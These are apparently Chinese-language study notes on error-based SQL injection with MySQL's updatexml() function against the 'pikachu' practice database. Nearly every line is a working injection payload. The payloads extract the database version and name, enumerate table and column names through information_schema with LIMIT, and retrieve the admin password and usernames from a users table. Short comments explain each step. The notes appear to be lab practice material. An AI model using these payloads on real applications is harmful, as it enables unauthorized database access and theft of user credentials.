updatexml()
zrtonnn' and updatexml(1,concat(0x7e,version()),0)#
zrtonnn' and updatexml(1,concat(0x7e,database()),0)# 可以用来查询数据库
0x7e是~ version()版本,可以用来查询版本 #用来注释掉后面的内容
#报错只能一次显示一行
zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#
可以使用limit一次一次进行获取表名
zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#
如果我们想要得到第二个表名呢
zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1)),0)#
将limit后面的修改为1即可得到第二个表名
获取到表名后,在获取列名,思路是一样的
zrtonnn' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' limit 0,1)),0)#
获取到列名后,再来获取数据:
zrtonnn' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)# //获取密码
zrtonnn' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)# //获取用户名